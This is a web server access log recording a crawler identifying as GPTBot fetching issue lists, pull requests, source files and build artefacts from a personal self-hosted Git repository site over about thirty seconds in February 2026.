[Client 74.7.227.38] [Length 9969] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&state=all&type=all" -[17/Feb/2026:17:38:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10136] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&state=all&type=all" -[17/Feb/2026:17:38:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10146] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&state=all&type=all" -[17/Feb/2026:17:38:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9972] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&state=all&type=all" -[17/Feb/2026:17:38:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9971] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=all&type=all" -[17/Feb/2026:17:38:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10159] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&state=all&type=all" -[17/Feb/2026:17:38:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10134] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&state=all&type=all" -[17/Feb/2026:17:38:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10986] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:17:38:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11373] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:17:38:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/krx_gold_fetcher.py?display=source" [Client 74.7.227.38] [Length 12241] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/krx_gold_fetcher.py" -[17/Feb/2026:17:38:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11372] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:17:38:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10984] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:17:38:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11373] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:17:38:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/krx_gold_fetcher.py?display=source" [Client 74.7.227.38] [Length 12209] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/krx_gold_fetcher.py" -[17/Feb/2026:17:38:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10985] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:17:38:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/krx_gold_fetcher.py?display=rendered" [Client 74.7.227.38] [Length 10951] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/krx_gold_fetcher.py" -[17/Feb/2026:17:38:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11371] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:17:38:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10986] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:17:38:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/krx_gold_fetcher.py?display=rendered" [Client 74.7.227.38] [Length 10920] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/krx_gold_fetcher.py" -[17/Feb/2026:17:38:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/updateRecord.md?display=rendered" [Client 74.7.227.38] [Length 16209] [Gzip 2.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/updateRecord.md" -[17/Feb/2026:17:38:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:38:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:17:38:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9946] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:17:38:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/index.tsx?display=source" [Client 74.7.227.38] [Length 11882] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/index.tsx" -[17/Feb/2026:17:38:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/investing_fetcher.py?display=rendered" [Client 74.7.227.38] [Length 10953] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/investing_fetcher.py" -[17/Feb/2026:17:38:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/investing_fetcher.py?display=rendered" [Client 74.7.227.38] [Length 10922] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/investing_fetcher.py" -[17/Feb/2026:17:38:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out?display=rendered" [Client 74.7.227.38] [Length 11060] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:17:38:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:17:38:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/global.json?display=source" [Client 74.7.227.38] [Length 11343] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/global.json" -[17/Feb/2026:17:38:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/project.assets.json?display=source" [Client 74.7.227.38] [Length 37472] [Gzip 11.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/project.assets.json" -[17/Feb/2026:17:38:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11162] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:17:38:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11160] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:17:38:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea?files=git%20%ec%84%9c%eb%b2%84%20%ec%82%ac%ec%9a%a9%eb%b2%95%20%eb%8c%80%ed%99%94%20%eb%b3%b4%ea%b4%80%2fgit%20sever%20%ea%b0%9c%ec%84%a4%20%ea%b4%80%eb%a0%a8%20%eb%8c%80%ed%99%94.md" [Client 74.7.227.38] [Length 18131] [Gzip 3.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:17:38:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?project=-1&state=all&type=all" -[17/Feb/2026:17:38:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a?files=git%20%ec%84%9c%eb%b2%84%20%ec%82%ac%ec%9a%a9%eb%b2%95%20%eb%8c%80%ed%99%94%20%eb%b3%b4%ea%b4%80%2fgit%20sever%20%ea%b0%9c%ec%84%a4%20%ea%b4%80%eb%a0%a8%20%eb%8c%80%ed%99%94.md" [Client 74.7.227.38] [Length 19947] [Gzip 4.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:17:38:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2?files=git%20%ec%84%9c%eb%b2%84%20%ec%82%ac%ec%9a%a9%eb%b2%95%20%eb%8c%80%ed%99%94%20%eb%b3%b4%ea%b4%80%2fgit%20sever%20%ea%b0%9c%ec%84%a4%20%ea%b4%80%eb%a0%a8%20%eb%8c%80%ed%99%94.md" [Client 74.7.227.38] [Length 20707] [Gzip 4.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:17:38:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:38:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:17:38:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584?files=PostgresMonitor%2fwatchdog.py" [Client 74.7.227.38] [Length 31121] [Gzip 7.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/watchdog.py" -[17/Feb/2026:17:38:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584?files=PostgresMonitor%2fReadMe.txt" [Client 74.7.227.38] [Length 19724] [Gzip 4.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:17:39:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83?files=PostgresMonitor%2fBuildTip.txt" [Client 74.7.227.38] [Length 17733] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/BuildTip.txt" -[17/Feb/2026:17:39:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83?files=PostgresMonitor%2fwatchdog.py" [Client 74.7.227.38] [Length 30137] [Gzip 6.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/watchdog.py" -[17/Feb/2026:17:39:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/metadata.json?display=rendered" [Client 74.7.227.38] [Length 11125] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/metadata.json" -[17/Feb/2026:17:39:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/requirements.txt?display=source" [Client 74.7.227.38] [Length 11651] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/requirements.txt" -[17/Feb/2026:17:39:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/updateRecord.md?display=source" [Client 74.7.227.38] [Length 18841] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/updateRecord.md" -[17/Feb/2026:17:39:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/index.html" [Client 74.7.227.38] [Length 38582] [Gzip 9.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html" -[17/Feb/2026:17:39:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:39:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:39:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 11207] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:17:39:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 11205] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:17:39:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 11206] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:17:39:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr 